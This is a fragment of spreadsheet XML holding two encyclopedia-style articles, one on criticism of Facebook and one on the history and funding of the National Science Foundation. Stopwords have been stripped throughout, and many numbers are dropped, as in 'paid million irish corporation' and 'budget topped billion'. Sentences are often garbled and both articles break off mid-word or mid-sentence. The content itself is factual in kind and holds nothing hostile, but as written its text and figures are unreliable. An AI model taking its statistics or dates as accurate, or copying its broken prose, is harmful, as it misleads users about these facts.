    <t>facebook (and parent company meta platforms) subject criticism legal action. criticisms include outsize influence facebook lives health users employees, well facebook's influence media, specifically news, reported distributed. notable issues include internet privacy, widespread "like" button third-party websites tracking users, possible indefinite records user information, automatic facial recognition software, role workplace, including employer-employee account disclosure. facebook negative psychological effects include feelings sexual jealousy, stress, lack attention, social media addiction cases comparable drug addiction.facebook's operations also received coverage. company's electricity usage, avoidance, real-name user requirement policies, censorship policies, handling user data, involvement united states prism surveillance program highlighted media critics. facebook come scrutiny 'ignoring' shirking responsibility content posted platform, including copyright intellectual property infringement, hate speech, incitement rape, violence minorities, terrorism, fake news, facebook murder, crimes, violent incidents live-streamed facebook live functionality.the company employees also subject litigation cases years, prominent case concerning allegations mark zuckerberg broke oral contract cameron winklevoss, tyler winklevoss, divya narendra build then-named "harvardconnection" social network 2004, instead allegedly opting steal idea code launch facebook months harvardconnection began. original lawsuit eventually settled 2009, facebook paying approximately million cash 1.25 million shares. lawsuit 2011 dismissed. some critics point problems result demise facebook. facebook banned several governments various reasons, including syria, china, iran russia. censorship while facebook operates transparent policies around certain types content moderation—such removing hateful speech images contain violence—the company criticized selectively censoring information nontransparent ways. some examples include: censorship criticism facebook newspapers regularly report stories users claim they've censored facebook critical facebook itself, posts removed made less visible. examples include elizabeth warren 2019 rotem shtarkman 2016.in context media reports lawsuits people formerly working facebook content moderation, former facebook moderator (chris gray) claimed specific rules existed monitor sometimes target posts facebook anti-facebook criticize facebook action, instance matching keywords "facebook" "deletefacebook".facebook's search function accused preventing users searching certain terms. michael arrington techcrunch written facebook's possible censorship "ron paul" search term. moveon.org's facebook group organizing protests privacy violations could time found searching. word privacy also restricted. censorship around global politics 2015, reported facebook policy censor anything related kurdish opposition turkey, maps kurdistan, flags kurdish armed terrorist groups (such ypg), criticism mustafa kemal atatürk, founder turkey.in 2016, facebook banned also removed content regarding kashmir dispute. censorship line foreign policy 2021, facebook accused censoring messages critical israel supportive palestine. during conflict sheikh jarrah property dispute 2021 facebook accused deleting hundreds posts critical israel. senior facebook officials apologized palestinian prime minister censoring pro-palestinian voices.in october 2021, secret blacklist "dangerous individuals organizations" maintained facebook discovered intercept, revealed censorship mena region stricter usa. critics scholars argued blacklist guideline stiffles free discussion, well enforcing uneven enforcement rules. privacy issues facebook faced number privacy concerns; instance, august 2019, revealed company enlisted contractors generate transcripts users' audio chats. contractors tasked re-transcribing conversations order gauge accuracy automatic transcription tool. part concerns stem company's revenue model involves selling information users, loss privacy could entail. addition, employers organizations individuals known facebook data purposes. result peoples' identities sometimes revealed without permission. response, pressure groups governments increasingly asserted users' right privacy control personal data. psychological/sociological effects addition noting evolutionary biologist george williams development evolutionary medicine chronic medical conditions consequence evolutionary mismatches stateless environment nomadic hunter-gatherer life bands contemporary human life sedentary technologically modern state societies (e.g. weird societies), psychiatrist randolph nesse argued evolutionary mismatch important factor development certain mental disorders. 1948, percent u.s. households owned least automobile. 2000, majority u.s. households least personal computer internet access following year. 2002, majority u.s. survey respondents reported mobile phone. september 2007, majority u.s. survey respondents reported broadband internet home. january 2013, majority u.s. survey respondents reported owning smartphone. facebook addiction "world unplugged" study, conducted 2011, claims users quitting social networking sites comparable quitting smoking giving alcohol. another study conducted 2012 researchers university chicago booth school business united states found drugs like alcohol tobacco could keep social networking sites regarding level addictiveness. 2013 study journal cyberpsychology, behavior, social networking found users decided quit social networking sites felt addicted. 2014, site went minutes, prompting several users call emergency services.in april 2015, research center published survey 1,060 u.s. teenagers ages reported nearly three-quarters either owned access smartphone, percent went online daily percent saying went online "almost constantly". march 2016, frontiers psychology published survey post-secondary student facebook users (following face validity pilot another post-secondary student facebook users) large university north america showing severity adhd symptoms statistically significant positive correlation facebook usage driving motor vehicle impulses facebook driving potent among male users female users.in june 2018, children youth services review published regression analysis adolescent facebook users piedmont lombardy regions northern italy (that replicated previous findings among adult users) showing adolescents reporting higher adhd symptoms positively predicted facebook addiction, persistent negative attitudes past future predetermined influenced present actions, orientation achieving future goals, adhd symptoms additionally increasing manifestation proposed category psychological dependence known "problematic social media use". self-harm suicide research shows people feeling suicidal internet search suicide methods. websites provide graphic details information take life. this cannot right. where content breaches policies internet social media providers must removed. think going question whether even you, owners, longer control [the sites'] content. case, children accessing services all, parents aware idea authority overseeing algorithms content mirage. january 2019, health secretary united kingdom, children's commissioner england, urged facebook social media companies take responsibility risk children posed content platforms related self-harm suicide. envy facebook criticized making people envious unhappy constant exposure positive unrepresentative highlights peers. such highlights include, limited journal posts, videos, photos depict reference positive otherwise outstanding activities, experiences, facts. this effect caused mainly fact users facebook usually display positive aspects lives excluding negative, though also strongly connected inequality disparities social groups facebook open users classes society. sites addictioninfo.org state kind envy profound effects aspects life lead severe depression, self-loathing, rage hatred, resentment, feelings inferiority insecurity, pessimism, suicidal tendencies desires, social isolation, issues prove serious. this condition often called "facebook envy" "facebook depression" media.in 2010, social science computer review published research economists ralf caers vanessa castelyns sent online questionnaire linkedin facebook users respectively belgium found sites become tools recruiting applicants professional occupations well additional information applicants, used recruiters decide applicants would receive interviews. 2017, sociologist ofer sharone conducted interviews unemployed workers research effects linkedin facebook labor market intermediaries found social networking services (sns) filtration effect little evaluations merit, filtration effect exerted pressures workers manage careers conform logic filtration effect.in july 2019, sociologists steve mcdonald, amanda damarin, jenelle lawhorne, annika wilcox performed qualitative interviews recruiters metropolitan areas southern united states found recruiters filling low- general-skilled positions typically posted advertisements online boards recruiters filling high-skilled supervisor positions targeted passive candidates linkedin (i.e. employed workers actively seeking work possibly willing change positions), concluded resulting bifurcated winner-takes-all market recruiters focusing efforts poaching already employed high-skilled workers active seekers relegated hyper-competitive online boards.a joint study conducted german universities demonstrated facebook envy found many three people actually feel worse less satisfied lives visiting site. vacation photos found common source feelings resentment jealousy. after that, social interaction second biggest cause envy, facebook users compare number birthday greetings, likes, comments friends. visitors contributed least tended feel worst. "according findings, passive following triggers invidious emotions, users mainly envying happiness others, others spend vacations; socialize", study states.a 2013 study researchers university michigan found people used facebook, worse felt afterwards.narcissistic users show excessive grandiosity give negative emotion viewers cause envy, result, cause viewers' loneliness. viewers sometimes need terminate relationships avoid negative emotion. however, "avoidance" "terminate relationships" would reinforcement lead loneliness. cyclical pattern vicious circle loneliness avoidance coping, study states. divorce social networks, like facebook, detrimental effect marriages, users becoming worried spouse's contacts relations people online, leading marital breakdown divorce. according 2009 survey around percent divorce petitions included references facebook. facebook given platform interpersonal communication. researchers proposed high levels facebook could result facebook-related conflict breakup/divorce. previous studies shown romantic relationships damaged excessive internet use, facebook jealousy, partner surveillance, ambiguous information, online portrayal intimate relationships. excessive internet users reported greater conflict relationships. their partners feel neglected there's lower commitment lower feelings passion intimacy relationship. according article, researchers suspect facebook contribute increase divorce infidelity rates near future amount ease accessibility connect past partners. facebook cause feelings sexual jealousy. stress research performed psychologists edinburgh napier university indicated facebook adds stress users' lives. causes stress included fear missing important social information, fear offending contacts, discomfort guilt rejecting user requests deleting unwanted contacts unfriended blocked facebook friends users, displeasure friend requests rejected ignored, pressure entertaining, criticism intimidation facebook users, appropriate etiquette different types friends. many people started using facebook positive purposes positive expectations found website negatively impacted lives.next that, increasing number messages social relationships embedded also increases amount social information demanding reaction users. consequently users perceive giving much social support friends. this dark side usage called 'social overload'. caused extent usage, number friends, subjective social support norms, type relationship (online-only offline friends) indirect effect. psychological behavioral consequences social overload include perceptions exhaustion, user satisfaction, high intentions reduce stop using sns. narcissism july 2018, meta-analysis published psychology popular media found grandiose narcissism positively correlated time spent social media, frequency status updates, number friends followers, frequency posting self-portrait digital photographs, meta-analysis published journal personality april 2018 found positive correlation grandiose narcissism social networking service usage replicated across platforms (including facebook). march 2020, journal adult development published regression discontinuity analysis millennial facebook users investigating differences narcissism facebook usage cohorts born 1977 1990 1991 2000 found later born millennials scored significantly higher both. june 2020, addictive behaviors published systematic review finding consistent, positive, significant correlation grandiose narcissism proposed category psychological dependence called "problematic social media use". also 2018, social psychologist jonathan haidt fire president greg lukianoff noted coddling american mind former facebook president sean parker stated 2017 interview like button consciously designed prime users receiving likes feel dopamine rush part "social-validation feedback loop"."conspicuous compassion" practice publicly donating large sums money charity enhance social prestige donor, sometimes described type conspicuous consumption. jonathan haidt greg lukianoff argued microaggression training college campuses united states call-out culture climate self-censorship fear shaming virtue signalling social media mobs users often anonymous tend deindividuate consequence. citing february 2017 research center survey data showing critical facebook postings expressing "indignant disagreement" twice likely receive likes, comments, shares (along similar finding twitter posts published pnas july 2017), haidt tobias rose-stockwell cite phrase "moral grandstanding" describe audience social media forums converts much interpersonal communication public performance.following murder george floyd 2020 subsequent protests name, civiqs yougov/economist polls showed support black lives matter among white americans increased points points early june 2020 (with percent support) fell points early august 2020, april 2021, civiqs polls showed support black lives matter among white americans reverted roughly level support prior george floyd's murder percent favor percent opposed). february 2021 interview firing line, journalist charles blow criticized minority young white protestors george floyd protests united states argued using protests personal growth substitute social rites passage (e.g. prom) summertime social gatherings (e.g. attending movie theaters concerts) precluded covid-19 lockdowns social distancing measures, noting lockdowns began relaxed removed, support black lives matter among whites began decline.in february 2021, psychological medicine published survey reviewing 14,785 publicly reported murders english language news worldwide 1900 2019 compiled database psychiatrists york state psychiatric institute columbia university irving medical center found 1,315 personal-cause mass murders (i.e. driven personal motivations occurring within context war, state-sponsored group-sponsored terrorism, gang activity, organized crime) percent mass murderers percent mass shooters "serious mental illness" (e.g. schizophrenia, bipolar disorder, major depressive disorder), mass shootings become common forms mass murder since 1970 (with percent occurring united states alone), mass shooters united states likely legal histories, engage recreational drug alcohol abuse, display non-psychotic psychiatric neurologic symptoms.survey coauthor psychiatrist paul appelbaum argued data survey indicated "difficulty coping life events seem useful foci prevention mass shootings] policy emphasis serious mental illness", psychiatrist ronald pies suggested psychopathology understood three-gradation continuum mental, behavioral emotional disturbance mass shooters falling middle category "persistent emotional disturbance". 2015, psychiatrists james knoll george annas noted tendency media attention following mass shootings mental health leads sociocultural factors comparatively overlooked. instead, knoll annas cite research social psychologists jean twenge keith campbell narcissism social rejection personal histories mass shooters, well cognitive scientist steven pinker's suggestion better angels nature (2011) reductions human violence dependent upon reducing human narcissism. non-informing, knowledge-eroding medium facebook tech company billion monthly active users second quarter 2020 therefore meaningful impact masses data algorithms used personalized content creation automatization; however, method used manipulate users various ways. problem misinformation exacerbated educational bubble, users' critical thinking ability news culture. based 2015 study, 62.5% facebook users oblivious curation news feed. furthermore, scientists started investigate algorithms unexpected outcomes lead antisocial political, economic, geographic, racial, discrimination. facebook remained scarce transparency inner workings algorithms used news feed correlation. algorithms past activities reference point predicting users' taste keep engaged. however, leads formation filter bubble starts refrain users diverse information. users left skewed worldview derived preferences biases.in 2015, researchers facebook published study indicating facebook algorithm perpetuates echo chamber amongst users occasionally hiding content individual feeds users potentially would disagree with: example algorithm removed every diverse content news sources self-identified liberals. general, results study indicated facebook algorithm ranking system caused approximately less diverse material users' content feeds, reduction click-through-rate diverse material. 2018, social psychologist jonathan haidt fire president greg lukianoff argued coddling american mind filter bubbles created news feed algorithm facebook platforms principal factors amplifying political polarization united states since 2000 (when majority u.s. households first least personal computer internet access following year).in reflections revolution france (1790), philosopher edmund burke observed afraid live trade private stock reason; suspect stock small, individuals would better avail general bank capital nations ages." signal noise (2012), statistician nate silver noted estimated world generating quintillion bytes data (more percent created previous years), increase data analogous increases book production consequence invention printing press 1440 johannes gutenberg well effect increase book production causing reformation, counter-reformation, european wars religion.citing burke, jonathan haidt tobias rose-stockwell suggested atlantic december 2019 proportion information generation receives regular social media usage information created primarily within past month (e.g. videos, tabloid gossip celebrities, sensationalistic takes news items) rather information created decades centuries past, members generation less familiar accumulated knowledge wisdom humanity (e.g. great ideas, great books, history) generations past, consequence, prone embrace misguided ideas bring greater esteem prestige within immediate social network (noting declining faith among generation democracy across ideological spectrum polling data alongside renewed interest socialism, communism, nazism reflective ignorance history 20th century).facebook has, least political field, counter-effect informed: studies total 2,000 participants, influence social media general knowledge political issues examined context presidential elections. results showed frequency facebook moderately negatively related general political knowledge. this also case considering demographic, political-ideological variables previous political knowledge. according latter, causal relationship indicated: higher facebook use, general political knowledge declines. 2019, jonathan haidt argued "very good chance american democracy fail, next years catastrophic failure democracy." following 2021 united states capitol attack, february 2021, facebook announced would reduce amount political content users news feeds. other psychological effects admitted many students experienced bullying site, leads psychological harm. students high schools face possibility bullying adverse behaviors facebook every day. many studies attempted discover whether facebook positive negative effect children's teenagers' social lives, many come conclusion distinct social problems arise facebook usage. british neuroscientist susan greenfield stuck issues children encounter social media sites. said rewire brain, caused hysteria whether social networking sites safe. back claims research, cause quite studies done subject. when self broken others badmouthing, criticism, harassment, criminalization vilification, intimidation, demonization, demoralization, belittlement, attacking someone site cause much envy, anger, depression.sherry turkle, book alone together: expect more technology less each other, argues social media brings people closer apart time. main points makes high risk treating persons online dispatch like objects. although people networked facebook, expectations tend lessened. according turkle, could cause feeling loneliness spite together.between 2016 2018, number 15-year-olds reported bullied social media rose 11%, region covered ofcom. user influence experiments academic facebook researchers collaborated test messages people facebook influence behavior. instance, 61-million-person experiment social influence political mobilization", 2010 elections, facebook users given opportunity "tell friends voted" clicking voted" button. users likely click button associated friends already voted.much controversially, 2014 study "emotional contagion through social networks" manipulated balance positive negative messages seen 689,000 facebook users. researchers concluded found "some first experimental evidence support controversial claims emotions spread throughout network, [though] effect sizes manipulations small."unlike voted" study, presumptively beneficial ends raised concerns, study criticized ethics methods/claims. controversy study grew, adam kramer, lead author studies member facebook data team, defended work facebook update. days later, sheryl sandburg, facebook's coo, made statement traveling abroad. while indian chambers commerce event delhi stated "this part ongoing research companies test different products, was. poorly communicated communication apologize. never meant upset you."shortly thereafter, july 2014, today reported privacy watchdog group electronic privacy information center (epic) filed formal complaint federal trade commission claiming facebook broken conducted study emotions users without knowledge consent. complaint, epic alleged facebook deceived users secretly conducting psychological experiment emotions: time experiment, facebook state data policy user data would used research purposes. facebook also failed inform users personal information would shared researchers."beyond ethical concerns, scholars criticized methods reporting study's findings. john grohol, writing psych central, argued despite title claims "emotional contagion", study look emotions all. instead, authors used application (called "linguistic inquiry word count" liwc 2007) simply counted positive negative words infer users' sentiments. wrote shortcoming liwc tool understand negations. hence, tweet happy" would scored positive: "since liwc 2007 ignores subtle realities informal human communication, researchers." grohol concluded given subtleties, effect size findings little "statistical blip". kramer (2014) found 0.07%—that's percent, that's 1/15th percent!!—decrease negative words people's status updates number negative posts facebook news feed decreased. know many words read write written less negative word effect? probably thousands. consequences controversy pending court proceedings) prompt "editorial expression concern" publisher, proceedings national academy sciences, well blog posting okcupid titled experiment human beings!" september 2014, professor james grimmelmann argued actions companies "illegal, immoral, mood-altering" filed notices maryland attorney general cornell institutional review board.in study also criticized british psychological society said, letter guardian, "there undoubtedly degree harm caused, many individuals affected increased levels negative emotion, consequent potential economic costs, increase possible mental health problems burden health services. so-called 'positive' manipulation also potentially harmful." avoidance facebook uses complicated series shell companies havens avoid paying billions dollars corporate tax. according express tribune, facebook among corporations "avoided billions dollars using offshore companies." example, facebook routes billions dollars profits using double irish dutch sandwich avoidance schemes bank accounts cayman islands. dutch newspaper handelsblad concluded paradise papers published late 2017 facebook pays "practically taxes" worldwide.for example, facebook paid: 2011, £2.9m £840m profits 2012 2013 2014 £4,327 hundreds millions pounds revenues transferred havens.according economist member pvda delegation inside progressive alliance socialists democrats european parliament (s&amp;d) paul tang, 2013 2015 lost estimated €1,453m €2,415m facebook. when comparing others countries outside taxing facebook rate 0.03% 0.1% revenue (around ebt) whereas rate near countries outside even rate applied period suggested ecofin council fraud rate facebook would meant loss €327m €817m. july 2016, u.s. department justice filed petition u.s. district court francisco, asking court order enforce administrative summons issued facebook, inc., internal revenue code section 7602, connection internal revenue service examination facebook's year 2010 u.s. federal income return.in november 2017, irish independent recorded 2016 financial year, facebook paid million irish corporation €12.6 billion revenues routed ireland, giving irish effective rate €12.6 billion 2016 facebook revenues routed ireland almost half facebook's global revenues. april 2018, reuters wrote facebook's non–u.s. accounts legally housed ireland purposes, moved 2018 gdpr regulations.in november 2018, irish times reported facebook routed €18.7 billion revenues ireland (almost half global revenues), paid million irish corporation tax. treatment employees contractors moderators facebook hires employees contractors, including accenture, arvato, cognizant, resources, genpact, serve content moderators, reviewing potentially problematic content posted facebook instagram. many contractors face unrealistic expectations, harsh working conditions, constant exposure disturbing content, including graphic violence, animal abuse, child pornography. contractor employment contingent achieving maintaining score 100-point scale metric known "accuracy". falling score result dismissal. some reported posttraumatic stress disorder (ptsd) stemming lack access counseling, coupled unforgiving expectations violent content assigned review.content moderator keith utley, employed cognizant, experienced heart attack work march 2018; office lacked defibrillator, utley transported hospital died. selena scola, employee contractor unlimited, inc., sued employer developed ptsd result "constant unmitigated exposure highly toxic extremely disturbing images workplace". december 2019, former employee chris gray began legal action high court ireland, claiming damages ptsd experienced moderator, first estimated pending cases. february 2020, employees tampa, florida filed lawsuit facebook cognizant alleging developed ptsd related mental health impairments result constant unmitigated exposure disturbing content.in february 2020, european union commissioners criticized plans facebook dealing working conditions contracted moderate content social media platform.facebook agreed settle class action lawsuit million 2020, included $1,000 payment 11,250 moderators class, additional compensation available treatment ptsd conditions resulting jobs. employees plans facebook-owned real estate development known "willow village" criticized resembling "company town", often curtails rights residents, encourages forces employees remain within environment created monitored employer outside work hours. critics referred development "zucktown" "facebookville" company faced additional criticism effect existing communities california. operational manager facebook march 2021, along three former candidates facebook hiring process complained eeoc racial bias practiced company black people. current employee, oscar veneszee accused firm conducting subjective evaluations pushing idea racial stereotypes. eeoc labeled practice "systemic" racial bias initiated investigation. misleading campaigns competitors 2011, emails sent journalists bloggers making critical allegations google's privacy policies; however, later discovered anti-google campaign, conducted giant burson-marsteller, paid facebook referred level skullduggery" daily beast called "clumsy smear". while taking responsibility campaign, burson-marsteller said agreed keep client's (facebook's) identity secret. "whatever rationale, standard operating procedure policies, assignment terms declined", said.in december 2020, apple inc. announced initiative anti-tracking measures (opt-in tracking policy) introduced store services. facebook quickly reacted started criticise initiative, claiming apple's anti-tracking privacy focused change "harmful impact many small businesses struggling stay afloat free internet rely ever". facebook also launched so-called "speak small businesses" page. apple response stated "users know data collected shared across apps websites choice allow not". apple also backed electronic frontier foundation (eff) stated "facebook touts case protecting small businesses, truth".in march 2022, washington post revealed facebook partnered republican consulting firm targeted victory orchestrate campaign damage public reputation competitor tiktok. copying competitors' products features beyond acquiring competitors social messaging space strong potential, facebook often simply copies products features market faster. internal emails shown facebook's leadership, including mark zuckerberg frustrated time company spends prototyping, suggested explore copying entire products like pinterest. "copying faster innovating" admitted employee internal email thread, continued: gave top-down order ahead, copy e.g. pinterest gaming dynamics foursquare sure small team engineers, [product manager], designer would done super quickly."many facebook employees seem questioning facebook's approach cloning competitors. according leaks, quoted question facebook's internal all-hands was: "what next product, imitate already existing products market?" snapchat june 2014, facebook launched slingshot, sending ephemeral photos like snapchat does. august 2016, company released facebook stories, copy snapchat's popular feature. tiktok august 2020, facebook built facebook reels, feature functioned looked similar tiktok. pinterest several months, facebook experimenting called hobbi, took many cues pinterest. clubhouse summer 2021, facebook started roll live audio rooms, resembles clubhouse. content facebook criticized removing allowing various content posts, photos entire groups profiles. technical real-name policy controversy compromise facebook real-name system policy user profiles. real-name policy stems position "that way, always know connecting with. this helps keep community safe." real-name system allow adopted names pseudonyms, enforcement suspended accounts legitimate users, user provides identification indicating name. facebook representatives described incidents rare. user claimed responsibility anonymous android secret reporting "fake names" caused user profiles suspended, specifically targeting stage names drag queens. october 2014, chris cox, chief product officer f</t>
  </si>
  <si>
    <t>National Science Foundation</t>
  </si>
  <si>
    <t>national science foundation (nsf) independent agency united states government supports fundamental research education non-medical fields science engineering. medical counterpart national institutes health. with annual budget $8.3 billion (fiscal year 2020), funds approximately federally supported basic research conducted united states' colleges universities. fields, mathematics, computer science, economics, social sciences, major source federal backing. nsf's director deputy director appointed president united states confirmed united states senate, whereas president-appointed members national science board (nsb) require senate confirmation. director deputy director responsible administration, planning, budgeting day-to-day operations foundation, meets times year establish overall policies. current director sethuraman panchanathan. history mission national science foundation (nsf) established national science foundation 1950. stated mission promote progress science, advance national health, prosperity, welfare, secure national defense." nsf's scope expanded years include many areas initial portfolio, including social behavioral sciences, engineering, science mathematics education. u.s. federal agency mandate support non-medical fields research. budget performance history since technology boom 1980s, congress generally embraced premise government-funded basic research essential nation's economic health global competitiveness, national defense. that support manifested expanding budget—from billion 1983 $8.28 billion 2020. published annual reports since 1950, since millennium reports, variously called "performance report" "accountability report" "performance highlights" "financial highlights"; latest available 2013 agency financial report posted december 2013, six-page 2013 performance financial highlights posted march 2013. more recently, focused obtaining high return investment spending scientific research.various bills sought direct funds within nsf. 1981, office management budget (omb) introduced proposal reduce social sciences directorate's budget 75%. economist robert moffit suggests connection proposal democratic senator william proxmire's golden fleece award series criticizing "frivolous" government spending—proxmire's first golden fleece awarded 1975 granting $84,000 social science project investigating people fall love. ultimately, omb's reduction proposal failed, economics program budget fall 40%. 2012, political science research barred funding passage flake amendment, breaking precedent granting autonomy determine priorities. funding profile fiscal year 2020, received 42,400 proposals awarded 12,100, funding rate 28%. 2021, estimates 43,200 11,500 respectively, giving funding rate 29%. according 2020 numbers, median annualized award size $153,800 average duration award years. timeline pre–world although federal government established nearly scientific organizations 1910 1940, relied upon primarily laissez-faire approach scientific research development. academic research science engineering occasionally received federal funding. within university laboratories, almost support came private contributions charitable foundations. industrial laboratories, concentration workers funding (some military government programs result roosevelt's deal) would eventually raise concern wartime period. particular, concerns raised industry laboratories largely allowed full patent rights technologies developed federal funds. these concerns, part, efforts like senator harley kilgore's "science mobilization act". 1940–49 amidst growing awareness military capability depended strength science engineering, congress considered several proposals support research fields. separately, president franklin roosevelt sponsored creation organizations coordinate federal funding science war, including national defense research committee office scientific research development (osrd) 1941 1947. despite broad agreement principle federal support science, working consensus organize manage required five years. five-year political debate creation national scientific agency topic academic study, understood variety perspectives. themes include disagreements administrative structure, patents inclusion social sciences, populist-versus-scientist dispute, well roles political parties, congress, president truman.commonly, debate characterized conflict deal senator harley kilgore osrd head vannevar bush. narratives national science foundation prior 1970s typically concentrated vannevar bush 1945 publication science—the endless frontier. report, vannevar bush, head office scientific research development began manhattan project, addressed plans postwar years foster government commitment science technology. issued president harry truman july 1945, report made strong case federally-funded scientific research, arguing nation would reap rich dividends form better health care, vigorous economy, stronger national defense. proposed creating federal agency, national research foundation.the first appeared comprehensive deal policy proposed sen. harley kilgore west virginia. 1942, senator kilgore introduced "science mobilization act" 1297), pass. perceiving organizational chaos, elitism, over-concentration funds elite universities, lack incentives socially applicable research, kilgore envisioned comprehensive centralized research body supporting basic applied research would controlled members public civil servants rather scientific experts. public would rights patents funded public monies research monies would equitably spread across universities. kilgore's supporters included non-elite universities, small businesses, budget bureau. proposals received mixed support. vannevar bush opposed kilgore, preferring science policy driven experts scientists rather public civil servants. bush concerned public interests would politicize science, believed scientists would best judges direction needs field. while bush kilgore agreed need national science policy, bush maintained scientists continue research results patents, wanted project selection limited scientists, focused support basic research, social sciences, leaving market support applied projects.sociologist daniel kleinman divides debate three broad legislative attempts. first attempt consisted 1945 magnuson bill 1285), 1945 science technology mobilization bill, 1945 compromise bill 1720), 1946 compromise bill 1850), mills bill (h.b. 6448). magnuson bill sponsored senator warren magnuson drafted osrd, headed vannevar bush. science technology mobilization bill promoted harley kilgore. bills called creation centralized science agency, differed governance research supported. second attempt, 1947, included senator alexander smith's bill 526, senator elbert thomas's bill 525. smith bill reflected ideas vannevar bush, thomas bill identical previous year's compromise bill 1850).after amendments, smith bill made president truman's desk, vetoed. truman wrote regrettably, proposed agency would "divorced control people extent implies distinct lack faith democratic process". third attempt began introduction 2385 1948. this compromise bill cosponsored smith kilgore, bush aide john teeter contributed drafting process. 1949, introduced group senators behind 2385, marking fourth final effort establish national science agency. essentially identical 2385, passed senate house amendments. signed president truman 1950. kleinman points final bill closely resembles vannevar bush's proposals. 1950–59 1950 harry truman signed public 507, u.s.c. creating national science foundation. provided national science board twenty-four part-time members. 1951 truman nominated alan waterman, chief scientist office naval research, become first director. with korean underway, agency's initial budget $151,000 months. after moving administrative offices twice, began first full year operations appropriation congress $3.5 million, less almost $33.5 million requested research grants awarded. after 1957 soviet union orbited sputnik first ever man-made satellite, national self-appraisal questioned american education, scientific, technical industrial strength congress increased appropriation 1958 million. 1958 selected kitt peak, near tucson, arizona, site first national observatory, would give astronomer unprecedented access state-of-the-art telescopes; previously major research telescopes privately funded, available astronomers taught universities them. idea expanded encompass national optical astronomy observatory, national radio astronomy observatory, national solar observatory, gemini observatory arecibo observatory, funded whole part nsf. nsf's astronomy program forged close working relationship nasa, also founded 1958, provides virtually u.s. federal support ground-based astronomy, nasa's responsibility u.s. effort space-based astronomy. 1959 u.s. nations concluded antarctic treaty reserving antarctica peaceful scientific research, presidential directive gave responsibility virtually u.s. antarctic operations research form united states antarctic program. 1960–69 1963, president john kennedy appointed leland john haworth second director nsf. during 1960s, impact sputnik crisis spurred international competition science technology accelerated growth. initiated number programs support institution-wide research decade including graduate science facilities program (started 1960), institutional grants science (started 1961), science development grants, better known centers excellence program (started 1964). notable projects conducted decade include creation national center atmospheric research (1960), creation division environmental sciences (1965), deep exploration endeavors project mohole (1961) deep drilling project (1968–1983), ecosystems analysis program (1969), ownership arecibo observatory (1969). 1969, franklin long tentatively selected take directorship nsf. nomination caused controversy opposition current administration's antiballistic missile program ultimately rejected president richard nixon. william mcelroy instead took third director 1969. 1968, budget reached nearly $500 million. 1970–79 1972 took management twelve interdisciplinary materials research laboratories defense department's advanced research projects agency (darpa). these university-based laboratories taken integrated approach academic departments time, encouraging physicists, chemists, engineers, metallurgists cross departmental boundaries systems approaches attack complex problems materials synthesis processing. expanded laboratories nationwide network materials research science engineering centers. 1972 launched biennial "science engineering indicators" report president congress, required 1950. 1977 first interconnection unrelated networks developed, darpa. 1980–89 during decade, increasing involvement lead three-tiered system internetworks managed universities, nonprofit organizations, government agencies. mid-1980s, primary financial support growing project assumed nsf. 1983, budget topped billion first time. major increases nation's research budget proposed "the country recognizes importance research science technology, education". u.s. antarctic program taken appropriation requiring separate appropriation. received 27,000 proposals funded 12,000 1983. 1985, delivered ozone sensors, along balloons helium, researchers south pole measure stratospheric ozone loss. this response findings earlier year, indicating steep drop ozone period several years. internet project continued, known nsfnet. 1990–99 1990 nsf's appropriation passed billion first time. funded development several curricula based nctm standards, devised national council teachers mathematics. these standards widely adopted school districts subsequent decade. however, newspapers wall street journal called "math wars", organizations mathematically correct complained elementary texts based standards, including mathland, almost entirely abandoned instruction traditional arithmetic favor cutting, coloring, pasting, writing. during debate, lauded criticized favoring standards. 1991 nsfnet acceptable policy altered allow commercial traffic. 1995, private, commercial market thriving, decommissioned nsfnet, allowing public internet. 1993 students staff nsf-supported national center supercomputing applications (ncsa) university illinois, urbana-champaign, developed mosaic, first freely available browser allow world wide pages include graphics text. within months, ncsa mosaic becomes browser choice million users, sets exponential growth number users. 1994 nsf, together darpa nasa, launched digital library initiative. first grants went stanford university, graduate students, larry page sergey brin, began develop search engine used links pages ranking method, later commercialized name google. 1996 nsf-funded research established beyond doubt chemistry atmosphere antarctica grossly abnormal levels chlorine compounds greatly elevated. during months intense work, researchers learned known ozone hole. 1998 independent teams nsf-supported astronomers discovered expansion universe actually speeding previously unknown force, known dark energy, driving galaxies apart ever-increasing rate. since passage small business technology transfer 1992 (public 102–564, title ii), required reserve 0.3% extramural research budget small business technology transfer awards, 2.8% budget small business innovation research. 2000–09 joined federal agencies national nanotechnology initiative, dedicated understanding control matter atomic molecular scale. nsf's roughly $300 million annual investment nanotechnology research still largest 23-agency initiative. 2001, nsf's appropriation passed billion. nsf's "survey public attitudes toward understanding science technology" revealed public positive attitude toward science, poor understanding during 2004–5 sent "rapid response" research teams investigate aftermath indian ocean tsunami disaster hurricane katrina. nsf-funded engineering team helped uncover levees failed orleans. 2005, nsf's budget stood $5.6 billion, 2006 stood $5.91 billion 2007 fiscal year (october 2006, september 2007), 2007 requested $6.43 billion 2008. 2010–19 president obama requested $7.373 billion fiscal year 2013. october 2013 shutdown federal government, nsf's lapse funding, website "until notice", brought back online government passed budget. 2014, awarded rapid response grants study chemical spill contaminated drinking water 300,000 west virginia residents. early 2018, announced trump would research funding quickly rescinded backlash. 2018, heather wilson, secretary force, signed letter intent director initiating partnership research related space operations geosciences, advanced material sciences, information data sciences, workforce processes. grants merit review process seeks fulfill mission chiefly issuing competitive, limited-term grants response specific proposals research community establishing cooperative agreements research organizations. operate laboratories, unlike federal research agencies, notable examples nasa national institutes health (nih). uses four main mechanisms communicate funding opportunities generate proposals: dear colleague letters, program descriptions, program announcements, program solicitations.the receives 50,000 proposals year, funds 10,000 them. those funded typically projects ranked highest 'merit review' process, current version introduced 1997. reviews carried reviewers panels independent scientists, engineers, educators experts relevant fields study, selected particular attention avoiding conflicts interest. example, reviewers cannot work itself, institution employs proposing researchers. proposal evaluations confidential: proposing researchers them, names reviewers.the first merit review criterion 'intellectual merit', second 'broader societal impact' proposed research; latter reflects broader global trend funding agencies demand evidence research 'impact' opposition scientific policy communities since inception 1997. june 2010, national science board (nsb), governing body science advisers legislative executive branches, convened 'task force merit review' determine "how well current merit review criteria used evaluate proposals serving agency." task force reinforced support criteria appropriate goals aims agency published revised version merit review criteria 2012 report, clarify improve function criteria. however, criteria already mandated merit review procedures 2010 re-authorization america competes act. also includes emphasis promoting potentially transformative research, phrase included recent incarnation 'merit review' criteria.most grants individuals small groups investigators, carry research home campuses. other grants provide funding mid-scale research centers, instruments, facilities serve researchers many institutions. still, others fund national-scale facilities shared research community whole. examples national facilities include nsf's national observatories, giant optical radio telescopes; antarctic research sites; high-end computer facilities ultra-high-speed network connections; ships submersibles used ocean research; gravitational wave observatories. addition researchers research facilities, grants also support science, engineering mathematics education pre-k 